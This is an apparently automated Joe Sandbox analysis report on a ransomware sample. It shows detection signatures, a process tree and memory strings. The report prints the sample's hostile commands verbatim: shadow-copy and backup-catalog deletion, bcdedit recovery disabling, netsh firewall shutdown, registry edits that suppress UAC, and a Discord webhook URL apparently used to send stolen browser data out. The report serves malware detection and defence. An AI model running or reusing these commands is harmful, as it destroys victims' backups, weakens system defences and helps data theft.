Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 53c0505a_by_Libranalysis

Overview

General Information

Sample Name:53c0505a_by_Libranalysis (renamed file extension from none to exe)
Analysis ID:414396
MD5:53c0505afe3b2bf43c5724b954da464c
SHA1:20bc975d529fac15b2c848e8a451a9e53f861e8b
SHA256:c625f2b67dccfb06ba5a092523c72fa5014589395e16e7509a09144008ce5ee0
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: WannaCry Ransomware
Yara detected RansomwareGeneric
Creates files inside the volume driver (system volume information)
Deletes shadow drive data (may be related to ransomware)
Deletes the backup plan of Windows
Drops PE files to the startup folder
May disable shadow drive data (uses vssadmin)
Modifies the windows firewall
Sigma detected: Copying Sensitive Files with Credential Data
Sigma detected: Modification of Boot Configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses bcdedit to modify the Windows boot settings
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Creates COM task schedule object (often to register a task for autostart)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Backup Catalog Deleted
Sigma detected: Netsh Port or Application Allowed
Sigma detected: PowerShell Script Run in AppData
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses reg.exe to modify the Windows registry
Yara detected AESCRYPT Tool

Classification

Startup

  • System is w10x64
  • 53c0505a_by_Libranalysis.exe (PID: 5884 cmdline: 'C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' MD5: 53C0505AFE3B2BF43C5724B954DA464C)
    • conhost.exe (PID: 384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4844 cmdline: 'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.bat C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • WMIC.exe (PID: 2132 cmdline: wmic shadowcopy delete MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • vssadmin.exe (PID: 6252 cmdline: vssadmin delete shadows /all /quiet MD5: 47D51216EF45075B5F7EAA117CC70E40)
      • bcdedit.exe (PID: 6288 cmdline: bcdedit /set {current} optionsedit off MD5: 6E05CD5195FDB8B6C68FC90074817293)
      • bcdedit.exe (PID: 6312 cmdline: bcdedit /set {current} advancedoptions off MD5: 6E05CD5195FDB8B6C68FC90074817293)
      • bcdedit.exe (PID: 6332 cmdline: bcdedit /set {current} bootems no MD5: 6E05CD5195FDB8B6C68FC90074817293)
      • bcdedit.exe (PID: 6356 cmdline: bcdedit /set {default} recoveryenabled no MD5: 6E05CD5195FDB8B6C68FC90074817293)
      • bcdedit.exe (PID: 6428 cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: 6E05CD5195FDB8B6C68FC90074817293)
      • WMIC.exe (PID: 6496 cmdline: wmic os get caption MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • findstr.exe (PID: 6516 cmdline: findstr /I /C:'10' MD5: BCC8F29B929DABF5489C9BE6587FF66D)
      • netsh.exe (PID: 6632 cmdline: netsh advfirewall firewall add rule name='Micorosoft Windows Update' dir=in action=allow program='C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' enable=yes MD5: 98CC37BBF363A38834253E22C80A8F32)
      • netsh.exe (PID: 6796 cmdline: netsh advfirewall set currentprofile state off MD5: 98CC37BBF363A38834253E22C80A8F32)
      • wbadmin.exe (PID: 6928 cmdline: wbadmin.exe delete catalog -quiet MD5: EE1E2C4D42579B19D765420E07589148)
      • reg.exe (PID: 5112 cmdline: REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 6392 cmdline: REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /f MD5: E3DACF0B31841FA02064B4457D44B357)
  • 53c0505a_by_Libranalysis.exe (PID: 6640 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe' MD5: 53C0505AFE3B2BF43C5724B954DA464C)
    • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6856 cmdline: 'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\539A.tmp\539B.tmp\539C.bat 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • WMIC.exe (PID: 6964 cmdline: wmic shadowcopy delete MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • vssadmin.exe (PID: 7156 cmdline: vssadmin delete shadows /all /quiet MD5: 47D51216EF45075B5F7EAA117CC70E40)
      • bcdedit.exe (PID: 5040 cmdline: bcdedit /set {current} optionsedit off MD5: 6E05CD5195FDB8B6C68FC90074817293)
      • bcdedit.exe (PID: 6280 cmdline: bcdedit /set {current} advancedoptions off MD5: 6E05CD5195FDB8B6C68FC90074817293)
      • bcdedit.exe (PID: 6304 cmdline: bcdedit /set {current} bootems no MD5: 6E05CD5195FDB8B6C68FC90074817293)
      • bcdedit.exe (PID: 668 cmdline: bcdedit /set {default} recoveryenabled no MD5: 6E05CD5195FDB8B6C68FC90074817293)
  • wbengine.exe (PID: 7040 cmdline: C:\Windows\system32\wbengine.exe MD5: 6E235F75DF84C387388D23D697D6540B)
  • vdsldr.exe (PID: 7112 cmdline: C:\Windows\System32\vdsldr.exe -Embedding MD5: CD0D2028997ABCA78774E062CEC4E701)
  • vds.exe (PID: 7148 cmdline: C:\Windows\System32\vds.exe MD5: 4940B49502323905B66039D0D1AB4613)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.batJoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
    C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.batJoeSecurity_AESCRYPTToolYara detected AESCRYPT ToolJoe Security
      C:\Users\user\AppData\Local\Temp\539A.tmp\539B.tmp\539C.batJoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
        C:\Users\user\AppData\Local\Temp\539A.tmp\539B.tmp\539C.batJoeSecurity_AESCRYPTToolYara detected AESCRYPT ToolJoe Security
          C:\Users\user\AppData\Local\Temp\19BE.tmp\aescrypt.exeJoeSecurity_AESCRYPTToolYara detected AESCRYPT ToolJoe Security
            Click to see the 1 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000000.00000002.501671078.0000000002160000.00000004.00000040.sdmpJoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
              00000000.00000002.501671078.0000000002160000.00000004.00000040.sdmpJoeSecurity_AESCRYPTToolYara detected AESCRYPT ToolJoe Security
                00000000.00000003.232327020.00000000024A5000.00000004.00000001.sdmpJoeSecurity_AESCRYPTToolYara detected AESCRYPT ToolJoe Security
                  00000012.00000002.506883281.0000000002600000.00000004.00000001.sdmpJoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
                    00000012.00000002.506883281.0000000002600000.00000004.00000001.sdmpJoeSecurity_AESCRYPTToolYara detected AESCRYPT ToolJoe Security
                      Click to see the 13 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Shadow Copies Deletion Using Operating Systems UtilitiesShow sources
                      Source: Process startedAuthor: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: wmic shadowcopy delete, CommandLine: wmic shadowcopy delete, CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: 'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.bat C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4844, ProcessCommandLine: wmic shadowcopy delete, ProcessId: 2132
                      Sigma detected: WannaCry RansomwareShow sources
                      Source: Process startedAuthor: Florian Roth (rule), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro: Data: Command: bcdedit /set {default} recoveryenabled no, CommandLine: bcdedit /set {default} recoveryenabled no, CommandLine|base64offset|contains: m^v+, Image: C:\Windows\System32\bcdedit.exe, NewProcessName: C:\Windows\System32\bcdedit.exe, OriginalFileName: C:\Windows\System32\bcdedit.exe, ParentCommandLine: 'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.bat C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4844, ProcessCommandLine: bcdedit /set {default} recoveryenabled no, ProcessId: 6356
                      Sigma detected: Copying Sensitive Files with Credential DataShow sources
                      Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: vssadmin delete shadows /all /quiet, CommandLine: vssadmin delete shadows /all /quiet, CommandLine|base64offset|contains: vh, Image: C:\Windows\System32\vssadmin.exe, NewProcessName: C:\Windows\System32\vssadmin.exe, OriginalFileName: C:\Windows\System32\vssadmin.exe, ParentCommandLine: 'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.bat C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4844, ProcessCommandLine: vssadmin delete shadows /all /quiet, ProcessId: 6252
                      Sigma detected: Modification of Boot ConfigurationShow sources
                      Source: Process startedAuthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community: Data: Command: bcdedit /set {default} recoveryenabled no, CommandLine: bcdedit /set {default} recoveryenabled no, CommandLine|base64offset|contains: m^v+, Image: C:\Windows\System32\bcdedit.exe, NewProcessName: C:\Windows\System32\bcdedit.exe, OriginalFileName: C:\Windows\System32\bcdedit.exe, ParentCommandLine: 'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.bat C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4844, ProcessCommandLine: bcdedit /set {default} recoveryenabled no, ProcessId: 6356
                      Sigma detected: Backup Catalog DeletedShow sources
                      Source: Event LogsAuthor: Florian Roth (rule), Tom U. @c_APT_ure (collection): Data: EventID: 524, Source: Microsoft-Windows-Backup
                      Sigma detected: Netsh Port or Application AllowedShow sources
                      Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: netsh advfirewall firewall add rule name='Micorosoft Windows Update' dir=in action=allow program='C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' enable=yes , CommandLine: netsh advfirewall firewall add rule name='Micorosoft Windows Update' dir=in action=allow program='C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' enable=yes , CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: 'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.bat C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4844, ProcessCommandLine: netsh advfirewall firewall add rule name='Micorosoft Windows Update' dir=in action=allow program='C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' enable=yes , ProcessId: 6632
                      Sigma detected: PowerShell Script Run in AppDataShow sources
                      Source: Process startedAuthor: Florian Roth, Jonhnathan Ribeiro, oscd.community: Data: Command: 'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\539A.tmp\539B.tmp\539C.bat 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe'', CommandLine: 'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\539A.tmp\539B.tmp\539C.bat 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe' , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe, ParentProcessId: 6640, ProcessCommandLine: 'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\539A.tmp\539B.tmp\539C.bat 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe'', ProcessId: 6856

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\19BE.tmp\aescrypt.exeMetadefender: Detection: 20%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\19BE.tmp\aescrypt.exeReversingLabs: Detection: 20%
                      Source: C:\Users\user\AppData\Local\Temp\539A.tmp\aescrypt.exeMetadefender: Detection: 20%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\539A.tmp\aescrypt.exeReversingLabs: Detection: 20%
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exeReversingLabs: Detection: 46%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 53c0505a_by_Libranalysis.exeVirustotal: Detection: 41%Perma Link
                      Source: 53c0505a_by_Libranalysis.exeReversingLabs: Detection: 46%
                      Source: 53c0505a_by_Libranalysis.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: Binary string: C:\Users\paulej\Documents\Source\AESCrypt\Windows\Console\Win32\Release\aescrypt.pdb source: 53c0505a_by_Libranalysis.exe, 00000000.00000003.232327020.00000000024A5000.00000004.00000001.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000003.264116735.0000000002715000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\paulej\Documents\Source\AESCrypt\Windows\Console\Win32\Release\aescrypt.pdb source: 53c0505a_by_Libranalysis.exe, 00000000.00000003.232327020.00000000024A5000.00000004.00000001.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000003.264116735.0000000002715000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeFile opened: C:\Users\user\AppData\Local\Temp\19BE.tmpJump to behavior
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeFile opened: C:\Users\user~1\Jump to behavior
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeFile opened: C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.tmpJump to behavior
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeFile opened: C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmpJump to behavior
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                      Source: 53c0505a_by_Libranalysis.exe, 00000000.00000002.501671078.0000000002160000.00000004.00000040.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000002.506883281.0000000002600000.00000004.00000001.sdmpString found in binary or memory: http://canarytokens.com/images/static/feedback/m0jawrijfonu4hrwf5oy4955s/index.html
                      Source: 53c0505a_by_Libranalysis.exe, 00000000.00000003.232327020.00000000024A5000.00000004.00000001.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000003.264116735.0000000002715000.00000004.00000001.sdmpString found in binary or memory: http://somelink.com/somefile.zip
                      Source: 53c0505a_by_Libranalysis.exe, 00000000.00000003.232327020.00000000024A5000.00000004.00000001.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000003.264116735.0000000002715000.00000004.00000001.sdmpString found in binary or memory: http://somelink.com/something.html
                      Source: 53c0505a_by_Libranalysis.exe, 00000000.00000002.501671078.0000000002160000.00000004.00000040.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000002.506883281.0000000002600000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org
                      Source: vssadmin.exe, 00000006.00000002.240822385.000001F04B370000.00000004.00000040.sdmpString found in binary or memory: https://discord.com/
                      Source: WMIC.exe, 00000018.00000003.271615545.00000196AAA2F000.00000004.00000001.sdmpString found in binary or memory: https://discord.com/api(
                      Source: vssadmin.exe, 0000001C.00000002.276846507.000001EB8F2BD000.00000004.00000020.sdmpString found in binary or memory: https://discord.com/api/webhooks/818640164577738752/
                      Source: WMIC.exe, 0000000E.00000002.253623760.000001B620130000.00000004.00000040.sdmpString found in binary or memory: https://discord.com/api/webhooks/818640164577738752/boGlXBRVGL1FruSl9InrHuMKJClbo4Ox
                      Source: vssadmin.exe, 0000001C.00000002.276824300.000001EB8F298000.00000004.00000020.sdmpString found in binary or memory: https://discord.com/api/webhooks/818640164577738752/boGlXBRVGL1FruSl9InrHuMKJClbo4Oxsl3mhENe
                      Source: WMIC.exe, 00000018.00000002.272554215.00000196AAB80000.00000004.00000040.sdmpString found in binary or memory: https://discord.com/api/webhooks/818640164577738752/boGlXBRVGL1FruSl9InrHuMKJClbo4Oxsl3mhENe1z-
                      Source: bcdedit.exe, 00000024.00000002.285771846.00000267125E4000.00000004.00000040.sdmpString found in binary or memory: https://discord.com/api/webhooks/818640164577738752/boGlXBRVGL1FruSl9InrHuMKJClbo4Oxsl3mhENe1z-2LnuD
                      Source: 53c0505a_by_Libranalysis.exe, 00000000.00000002.501671078.0000000002160000.00000004.00000040.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000002.506883281.0000000002600000.00000004.00000001.sdmpString found in binary or memory: https://discord.gg/E8dgPKsmrb
                      Source: 53c0505a_by_Libranalysis.exe, 00000012.00000002.506883281.0000000002600000.00000004.00000001.sdmpString found in binary or memory: https://i.imgur.com/a2t88yx.png
                      Source: 53c0505a_by_Libranalysis.exe, 00000000.00000002.500917947.000000000075A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Yara detected RansomwareGenericShow sources
                      Source: Yara matchFile source: 00000000.00000002.501671078.0000000002160000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.506883281.0000000002600000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.507012237.0000000002608000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.505668893.0000000000AF0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.501900758.00000000022F7000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.501851412.0000000002178000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.501788643.0000000002170000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.505805406.0000000000B47000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.bat, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\539A.tmp\539B.tmp\539C.bat, type: DROPPED
                      Deletes shadow drive data (may be related to ransomware)Show sources
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: 53c0505a_by_Libranalysis.exe, 00000000.00000002.501671078.0000000002160000.00000004.00000040.sdmpBinary or memory string: vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: vssadmin.exe, 00000006.00000002.239157810.000001F04B0F0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage
                      Source: vssadmin.exe, 00000006.00000002.239157810.000001F04B0F0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
                      Source: vssadmin.exe, 00000006.00000002.239157810.000001F04B0F0000.00000002.00000001.sdmpBinary or memory string: vssadmin Delete Shadows
                      Source: vssadmin.exe, 00000006.00000002.239157810.000001F04B0F0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
                      Source: vssadmin.exe, 00000006.00000002.239157810.000001F04B0F0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
                      Source: vssadmin.exe, 00000006.00000002.240863617.000001F04B374000.00000004.00000040.sdmpBinary or memory string: vssadmindeleteshadows/all/quiet
                      Source: vssadmin.exe, 00000006.00000002.239235849.000001F04B100000.00000004.00000020.sdmpBinary or memory string: C:\Users\user~1\AppData\Local\Temp\C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quietvssadmin delete shadows /all /quietWinsta0\Default
                      Source: vssadmin.exe, 00000006.00000002.239235849.000001F04B100000.00000004.00000020.sdmpBinary or memory string: vssadmin delete shadows /all /quiet
                      Source: 53c0505a_by_Libranalysis.exe, 00000012.00000002.506883281.0000000002600000.00000004.00000001.sdmpBinary or memory string: vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: vssadmin.exe, 0000001C.00000002.276857396.000001EB8F390000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage
                      Source: vssadmin.exe, 0000001C.00000002.276857396.000001EB8F390000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
                      Source: vssadmin.exe, 0000001C.00000002.276857396.000001EB8F390000.00000002.00000001.sdmpBinary or memory string: vssadmin Delete Shadows
                      Source: vssadmin.exe, 0000001C.00000002.276857396.000001EB8F390000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
